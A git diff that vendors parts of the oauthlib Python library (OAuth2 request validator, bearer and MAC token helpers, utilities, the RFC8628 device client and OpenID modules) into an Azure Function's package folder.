associated with the resource. For example, + token has access to ``read-only-images``. + Allows for fine grained, although arguably less + convenient, access control. + + A powerful way to use scopes would mimic UNIX ACLs and see a scope + as a group with certain privileges. For a restful API these might + map to HTTP verbs instead of read, write and execute. + + Note, the request.user attribute can be set to the resource owner + associated with this token. Similarly the request.client and + request.scopes attribute can be set to associated client object + and authorized scopes. If you then use a decorator such as the + one provided for django these attributes will be made available + in all protected views as keyword arguments. + + :param token: Unicode Bearer token + :param scopes: List of scopes (defined by you) + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is indirectly used by all core Bearer token issuing grant types: + - Authorization Code Grant + - Implicit Grant + - Resource Owner Password Credentials Grant + - Client Credentials Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_client_id(self, client_id, request, *args, **kwargs): + """Ensure client_id belong to a valid and active client. + + Note, while not strictly necessary it can often be very convenient + to set request.client to the client object associated with the + given client_id. + + :param client_id: Unicode client identifier. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + - Implicit Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_code(self, client_id, code, client, request, *args, **kwargs): + """Verify that the authorization_code is valid and assigned to the given + client. + + Before returning true, set the following based on the information stored + with the code in 'save_authorization_code': + + - request.user + - request.scopes + - request.claims (if given) + OBS! The request.user attribute should be set to the resource owner + associated with this authorization code. Similarly request.scopes + must also be set. + + The request.claims property, if it was given, should assigned a dict. + + If PKCE is enabled (see 'is_pkce_required' and 'save_authorization_code') + you MUST set the following based on the information stored: + - request.code_challenge + - request.code_challenge_method + + :param client_id: Unicode client identifier. + :param code: Unicode authorization code. + :param client: Client object set by you, see ``.authenticate_client``. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs): + """Ensure client is authorized to use the grant_type requested. + + :param client_id: Unicode client identifier. + :param grant_type: Unicode grant type, i.e. authorization_code, password. + :param client: Client object set by you, see ``.authenticate_client``. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + - Resource Owner Password Credentials Grant + - Client Credentials Grant + - Refresh Token Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs): + """Ensure client is authorized to redirect to the redirect_uri requested. + + All clients should register the absolute URIs of all URIs they intend + to redirect to. The registration is outside of the scope of oauthlib. + + :param client_id: Unicode client identifier. + :param redirect_uri: Unicode absolute URI. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + - Implicit Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs): + """Ensure the Bearer token is valid and authorized access to scopes. + + OBS! The request.user attribute should be set to the resource owner + associated with this refresh token. + + :param refresh_token: Unicode refresh token. + :param client: Client object set by you, see ``.authenticate_client``. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant (indirectly by issuing refresh tokens) + - Resource Owner Password Credentials Grant (also indirectly) + - Refresh Token Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs): + """Ensure client is authorized to use the response_type requested. + + :param client_id: Unicode client identifier. + :param response_type: Unicode response type, i.e. code, token. + :param client: Client object set by you, see ``.authenticate_client``. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + - Implicit Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs): + """Ensure the client is authorized access to requested scopes. + + :param client_id: Unicode client identifier. + :param scopes: List of scopes (defined by you). + :param client: Client object set by you, see ``.authenticate_client``. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by all core grant types: + - Authorization Code Grant + - Implicit Grant + - Resource Owner Password Credentials Grant + - Client Credentials Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_user(self, username, password, client, request, *args, **kwargs): + """Ensure the username and password is valid. + + OBS! The validation should also set the user attribute of the request + to a valid resource owner, i.e. request.user = username or similar. If + not set you will be unable to associate a token with a user in the + persistance method used (commonly, save_bearer_token). + + :param username: Unicode username. + :param password: Unicode password. + :param client: Client object set by you, see ``.authenticate_client``. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Resource Owner Password Credentials Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def is_pkce_required(self, client_id, request): + """Determine if current request requires PKCE. Default, False. + This is called for both "authorization" and "token" requests. + + Override this method by ``return True`` to enable PKCE for everyone. + You might want to enable it only for public clients. + Note that PKCE can also be used in addition of a client authentication. + + OAuth 2.0 public clients utilizing the Authorization Code Grant are + susceptible to the authorization code interception attack. This + specification describes the attack as well as a technique to mitigate + against the threat through the use of Proof Key for Code Exchange + (PKCE, pronounced "pixy"). See `RFC7636`_. + + :param client_id: Client identifier. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + + .. _`RFC7636`: https://tools.ietf.org/html/rfc7636 + """ + return False + + def get_code_challenge(self, code, request): + """Is called for every "token" requests. + + When the server issues the authorization code in the authorization + response, it MUST associate the ``code_challenge`` and + ``code_challenge_method`` values with the authorization code so it can + be verified later. + + Typically, the ``code_challenge`` and ``code_challenge_method`` values + are stored in encrypted form in the ``code`` itself but could + alternatively be stored on the server associated with the code. The + server MUST NOT include the ``code_challenge`` value in client requests + in a form that other entities can extract. + + Return the ``code_challenge`` associated to the code. + If ``None`` is returned, code is considered to not be associated to any + challenges. + + :param code: Authorization code. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: code_challenge string + + Method is used by: + - Authorization Code Grant - when PKCE is active + + """ + return None + + def get_code_challenge_method(self, code, request): + """Is called during the "token" request processing, when a + ``code_verifier`` and a ``code_challenge`` has been provided. + + See ``.get_code_challenge``. + + Must return ``plain`` or ``S256``. You can return a custom value if you have + implemented your own ``AuthorizationCodeGrant`` class. + + :param code: Authorization code. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: code_challenge_method string + + Method is used by: + - Authorization Code Grant - when PKCE is active + + """ + raise NotImplementedError('Subclasses must implement this method.') + + def is_origin_allowed(self, client_id, origin, request, *args, **kwargs): + """Indicate if the given origin is allowed to access the token endpoint + via Cross-Origin Resource Sharing (CORS). CORS is used by browser-based + clients, such as Single-Page Applications, to perform the Authorization + Code Grant. + + (Note: If performing Authorization Code Grant via a public client such + as a browser, you should use PKCE as well.) + + If this method returns true, the appropriate CORS headers will be added + to the response. By default this method always returns False, meaning + CORS is disabled. + + :param client_id: Unicode client identifier. + :param redirect_uri: Unicode origin. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: bool + + Method is used by: + - Authorization Code Grant + + """ + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/tokens.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/tokens.py new file mode 100644 index 0000000..9646b5c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/tokens.py @@ -0,0 +1,355 @@ +""" +oauthlib.oauth2.rfc6749.tokens +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module contains methods for adding two types of access tokens to requests. + +- Bearer https://tools.ietf.org/html/rfc6750 +- MAC https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01 +""" +import hashlib +import hmac +import warnings +from binascii import b2a_base64 +from urllib.parse import urlparse + +from oauthlib import common +from oauthlib.common import add_params_to_qs, add_params_to_uri + +from . import utils + + +class OAuth2Token(dict): + + def __init__(self, params, old_scope=None): + super().__init__(params) + self._new_scope = None + if 'scope' in params and params['scope']: + self._new_scope = set(utils.scope_to_list(params['scope'])) + if old_scope is not None: + self._old_scope = set(utils.scope_to_list(old_scope)) + if self._new_scope is None: + # the rfc says that if the scope hasn't changed, it's optional + # in params so set the new scope to the old scope + self._new_scope = self._old_scope + else: + self._old_scope = self._new_scope + + @property + def scope_changed(self): + return self._new_scope != self._old_scope + + @property + def old_scope(self): + return utils.list_to_scope(self._old_scope) + + @property + def old_scopes(self): + return list(self._old_scope) + + @property + def scope(self): + return utils.list_to_scope(self._new_scope) + + @property + def scopes(self): + return list(self._new_scope) + + @property + def missing_scopes(self): + return list(self._old_scope - self._new_scope) + + @property + def additional_scopes(self): + return list(self._new_scope - self._old_scope) + + +def prepare_mac_header(token, uri, key, http_method, + nonce=None, + headers=None, + body=None, + ext='', + hash_algorithm='hmac-sha-1', + issue_time=None, + draft=0): + """Add an `MAC Access Authentication`_ signature to headers. + + Unlike OAuth 1, this HMAC signature does not require inclusion of the + request payload/body, neither does it use a combination of client_secret + and token_secret but rather a mac_key provided together with the access + token. + + Currently two algorithms are supported, "hmac-sha-1" and "hmac-sha-256", + `extension algorithms`_ are not supported. + + Example MAC Authorization header, linebreaks added for clarity + + Authorization: MAC id="h480djs93hd8", + nonce="1336363200:dj83hs9s", + mac="bhCQXTVyfj5cmA9uKkPFx1zeOXM=" + + .. _`MAC Access Authentication`: https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01 + .. _`extension algorithms`: https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01#section-7.1 + + :param token: + :param uri: Request URI. + :param key: MAC given provided by token endpoint. + :param http_method: HTTP Request method. + :param nonce: + :param headers: Request headers as a dictionary. + :param body: + :param ext: + :param hash_algorithm: HMAC algorithm provided by token endpoint. + :param issue_time: Time when the MAC credentials were issued (datetime). + :param draft: MAC authentication specification version. + :return: headers dictionary with the authorization field added. + """ + http_method = http_method.upper() + host, port = utils.host_from_uri(uri) + + if hash_algorithm.lower() == 'hmac-sha-1': + h = hashlib.sha1 + elif hash_algorithm.lower() == 'hmac-sha-256': + h = hashlib.sha256 + else: + raise ValueError('unknown hash algorithm') + + if draft == 0: + nonce = nonce or '{}:{}'.format(utils.generate_age(issue_time), + common.generate_nonce()) + else: + ts = common.generate_timestamp() + nonce = common.generate_nonce() + + sch, net, path, par, query, fra = urlparse(uri) + + if query: + request_uri = path + '?' + query + else: + request_uri = path + + # Hash the body/payload + if body is not None and draft == 0: + body = body.encode('utf-8') + bodyhash = b2a_base64(h(body).digest())[:-1].decode('utf-8') + else: + bodyhash = '' + + # Create the normalized base string + base = [] + if draft == 0: + base.append(nonce) + else: + base.append(ts) + base.append(nonce) + base.append(http_method.upper()) + base.append(request_uri) + base.append(host) + base.append(port) + if draft == 0: + base.append(bodyhash) + base.append(ext or '') + base_string = '\n'.join(base) + '\n' + + # hmac struggles with unicode strings - http://bugs.python.org/issue5285 + if isinstance(key, str): + key = key.encode('utf-8') + sign = hmac.new(key, base_string.encode('utf-8'), h) + sign = b2a_base64(sign.digest())[:-1].decode('utf-8') + + header = [] + header.append('MAC id="%s"' % token) + if draft != 0: + header.append('ts="%s"' % ts) + header.append('nonce="%s"' % nonce) + if bodyhash: + header.append('bodyhash="%s"' % bodyhash) + if ext: + header.append('ext="%s"' % ext) + header.append('mac="%s"' % sign) + + headers = headers or {} + headers['Authorization'] = ', '.join(header) + return headers + + +def prepare_bearer_uri(token, uri): + """Add a `Bearer Token`_ to the request URI. + Not recommended, use only if client can't use authorization header or body. + + http://www.example.com/path?access_token=h480djs93hd8 + + .. _`Bearer Token`: https://tools.ietf.org/html/rfc6750 + + :param token: + :param uri: + """ + return add_params_to_uri(uri, [(('access_token', token))]) + + +def prepare_bearer_headers(token, headers=None): + """Add a `Bearer Token`_ to the request URI. + Recommended method of passing bearer tokens. + + Authorization: Bearer h480djs93hd8 + + .. _`Bearer Token`: https://tools.ietf.org/html/rfc6750 + + :param token: + :param headers: + """ + headers = headers or {} + headers['Authorization'] = 'Bearer %s' % token + return headers + + +def prepare_bearer_body(token, body=''): + """Add a `Bearer Token`_ to the request body. + + access_token=h480djs93hd8 + + .. _`Bearer Token`: https://tools.ietf.org/html/rfc6750 + + :param token: + :param body: + """ + return add_params_to_qs(body, [(('access_token', token))]) + + +def random_token_generator(request, refresh_token=False): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param refresh_token: + """ + return common.generate_token() + + +def signed_token_generator(private_pem, **kwargs): + """ + :param private_pem: + """ + def signed_token_generator(request): + request.claims = kwargs + return common.generate_signed_token(private_pem, request) + + return signed_token_generator + + +def get_token_from_header(request): + """ + Helper function to extract a token from the request header. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :return: Return the token or None if the Authorization header is malformed. + """ + token = None + + if 'Authorization' in request.headers: + split_header = request.headers.get('Authorization').split() + if len(split_header) == 2 and split_header[0].lower() == 'bearer': + token = split_header[1] + else: + token = request.access_token + + return token + + +class TokenBase: + + def __call__(self, request, refresh_token=False): + raise NotImplementedError('Subclasses must implement this method.') + + def validate_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + raise NotImplementedError('Subclasses must implement this method.') + + def estimate_type(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + raise NotImplementedError('Subclasses must implement this method.') + + +class BearerToken(TokenBase): + __slots__ = ( + 'request_validator', 'token_generator', + 'refresh_token_generator', 'expires_in' + ) + + def __init__(self, request_validator=None, token_generator=None, + expires_in=None, refresh_token_generator=None): + self.request_validator = request_validator + self.token_generator = token_generator or random_token_generator + self.refresh_token_generator = ( + refresh_token_generator or self.token_generator + ) + self.expires_in = expires_in or 3600 + + def create_token(self, request, refresh_token=False, **kwargs): + """ + Create a BearerToken, by default without refresh token. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param refresh_token: + """ + if "save_token" in kwargs: + warnings.warn("`save_token` has been deprecated, it was not called internally." + "If you do, call `request_validator.save_token()` instead.", + DeprecationWarning) + + if callable(self.expires_in): + expires_in = self.expires_in(request) + else: + expires_in = self.expires_in + + request.expires_in = expires_in + + token = { + 'access_token': self.token_generator(request), + 'expires_in': expires_in, + 'token_type': 'Bearer', + } + + # If provided, include - this is optional in some cases https://tools.ietf.org/html/rfc6749#section-3.3 but + # there is currently no mechanism to coordinate issuing a token for only a subset of the requested scopes so + # all tokens issued are for the entire set of requested scopes. + if request.scopes is not None: + token['scope'] = ' '.join(request.scopes) + + if refresh_token: + if (request.refresh_token and + not self.request_validator.rotate_refresh_token(request)): + token['refresh_token'] = request.refresh_token + else: + token['refresh_token'] = self.refresh_token_generator(request) + + token.update(request.extra_credentials or {}) + return OAuth2Token(token) + + def validate_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + token = get_token_from_header(request) + return self.request_validator.validate_bearer_token( + token, request.scopes, request) + + def estimate_type(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + if request.headers.get('Authorization', '').split(' ')[0].lower() == 'bearer': + return 9 + elif request.access_token is not None: + return 5 + else: + return 0 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/utils.py new file mode 100644 index 0000000..5c608b8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/utils.py @@ -0,0 +1,83 @@ +""" +oauthlib.utils +~~~~~~~~~~~~~~ + +This module contains utility methods used by various parts of the OAuth 2 spec. +""" +import datetime +import os +from urllib.parse import quote, urlparse + +from oauthlib.common import urldecode + + +def list_to_scope(scope): + """Convert a list of scopes to a space separated string.""" + if isinstance(scope, str) or scope is None: + return scope + elif isinstance(scope, (set, tuple, list)): + return " ".join([str(s) for s in scope]) + else: + raise ValueError("Invalid scope (%s), must be string, tuple, set, or list." % scope) + + +def scope_to_list(scope): + """Convert a space separated string to a list of scopes.""" + if isinstance(scope, (tuple, list, set)): + return [str(s) for s in scope] + elif scope is None: + return None + else: + return scope.strip().split(" ") + + +def params_from_uri(uri): + params = dict(urldecode(urlparse(uri).query)) + if 'scope' in params: + params['scope'] = scope_to_list(params['scope']) + return params + + +def host_from_uri(uri): + """Extract hostname and port from URI. + + Will use default port for HTTP and HTTPS if none is present in the URI. + """ + default_ports = { + 'HTTP': '80', + 'HTTPS': '443', + } + + sch, netloc, path, par, query, fra = urlparse(uri) + if ':' in netloc: + netloc, port = netloc.split(':', 1) + else: + port = default_ports.get(sch.upper()) + + return netloc, port + + +def escape(u): + """Escape a string in an OAuth-compatible fashion. + + TODO: verify whether this can in fact be used for OAuth 2 + + """ + if not isinstance(u, str): + raise ValueError('Only unicode objects are escapable.') + return quote(u.encode('utf-8'), safe=b'~') + + +def generate_age(issue_time): + """Generate a age parameter for MAC authentication draft 00.""" + td = datetime.datetime.now() - issue_time + age = (td.microseconds + (td.seconds + td.days * 24 * 3600) + * 10 ** 6) / 10 ** 6 + return str(age) + + +def is_secure_transport(uri): + """Check if the uri is over ssl.""" + if os.environ.get('OAUTHLIB_INSECURE_TRANSPORT'): + return True + return uri.lower().startswith('https://') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__init__.py new file mode 100644 index 0000000..04afdee --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__init__.py @@ -0,0 +1,10 @@ +""" +oauthlib.oauth2.rfc8628 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 Device Authorization RFC8628. +""" +import logging + +log = logging.getLogger(__name__) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..d99a968 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__init__.py new file mode 100644 index 0000000..b779915 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__init__.py @@ -0,0 +1,8 @@ +""" +oauthlib.oauth2.rfc8628 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming OAuth 2.0 Device Authorization RFC8628. +""" +from .device import DeviceClient diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..47f79a7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/device.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/device.cpython-39.pyc new file mode 100644 index 0000000..e777104 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/device.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/device.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/device.py new file mode 100644 index 0000000..1a50922 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/device.py @@ -0,0 +1,94 @@ +""" +oauthlib.oauth2.rfc8628 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 Device Authorization RFC8628. +""" + +from oauthlib.oauth2 import BackendApplicationClient, Client +from oauthlib.oauth2.rfc6749.errors import InsecureTransportError +from oauthlib.oauth2.rfc6749.parameters import prepare_token_request +from oauthlib.oauth2.rfc6749.utils import is_secure_transport, list_to_scope +from oauthlib.common import add_params_to_uri + + +class DeviceClient(Client): + + """A public client utilizing the device authorization workflow. + + The client can request an access token using a device code and + a public client id associated with the device code as defined + in RFC8628. + + The device authorization grant type can be used to obtain both + access tokens and refresh tokens and is intended to be used in + a scenario where the device being authorized does not have a + user interface that is suitable for performing authentication. + """ + + grant_type = 'urn:ietf:params:oauth:grant-type:device_code' + + def __init__(self, client_id, **kwargs): + super().__init__(client_id, **kwargs) + self.client_secret = kwargs.get('client_secret') + + def prepare_request_uri(self, uri, scope=None, **kwargs): + if not is_secure_transport(uri): + raise InsecureTransportError() + + scope = self.scope if scope is None else scope + params = [(('client_id', self.client_id)), (('grant_type', self.grant_type))] + + if self.client_secret is not None: + params.append(('client_secret', self.client_secret)) + + if scope: + params.append(('scope', list_to_scope(scope))) + + for k in kwargs: + if kwargs[k]: + params.append((str(k), kwargs[k])) + + return add_params_to_uri(uri, params) + + def prepare_request_body(self, device_code, body='', scope=None, + include_client_id=False, **kwargs): + """Add device_code to request body + + The client makes a request to the token endpoint by adding the + device_code as a parameter using the + "application/x-www-form-urlencoded" format to the HTTP request + body. + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra paramters. Default ''. + :param scope: The scope of the access request as described by + `Section 3.3`_. + + :param include_client_id: `True` to send the `client_id` in the + body of the upstream request. This is required + if the client is not authenticating with the + authorization server as described in + `Section 3.2.1`_. False otherwise (default). + :type include_client_id: Boolean + + :param kwargs: Extra credentials to include in the token request. + + The prepared body will include all provided device_code as well as + the ``grant_type`` parameter set to + ``urn:ietf:params:oauth:grant-type:device_code``:: + + >>> from oauthlib.oauth2 import DeviceClient + >>> client = DeviceClient('your_id', 'your_code') + >>> client.prepare_request_body(scope=['hello', 'world']) + 'grant_type=urn:ietf:params:oauth:grant-type:device_code&scope=hello+world' + + .. _`Section 3.4`: https://datatracker.ietf.org/doc/html/rfc8628#section-3.4 + """ + + kwargs['client_id'] = self.client_id + kwargs['include_client_id'] = include_client_id + scope = self.scope if scope is None else scope + return prepare_token_request(self.grant_type, body=body, device_code=device_code, + scope=scope, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__init__.py new file mode 100644 index 0000000..7078d1f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__init__.py @@ -0,0 +1,7 @@ +""" +oauthlib.openid +~~~~~~~~~~~~~~ + +""" +from .connect.core.endpoints import Server, UserInfoEndpoint +from .connect.core.request_validator import RequestValidator diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..07871a4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..6488aa9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..5cef064 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..183ca4c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/request_validator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/request_validator.cpython-39.pyc new file mode 100644 index 0000000..284147e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/request_validator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/tokens.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/tokens.cpython-39.pyc new file mode 100644 index 0000000..997a156 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/tokens.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__init__.py new file mode 100644 index 0000000..8fd8a0b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__init__.py @@ -0,0 +1,9 @@ +""" +oauthlib.oopenid.core +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OpenID Connect +""" +from .pre_configured import Server +from .userinfo import UserInfoEndpoint diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..d2d84fd Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/pre_configured.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/pre_configured.cpython-39.pyc new file mode 100644 index 0000000..99981f2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/pre_configured.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/userinfo.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/userinfo.cpython-39.pyc new file mode 100644 index 0000000..4fc12af Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/userinfo.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/pre_configured.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/pre_configured.py new file mode 100644 index 0000000..e95c56e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/pre_configured.py @@ -0,0 +1,97 @@ +""" +oauthlib.openid.connect.core.endpoints.pre_configured +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various endpoints needed +for providing OpenID Connect servers. 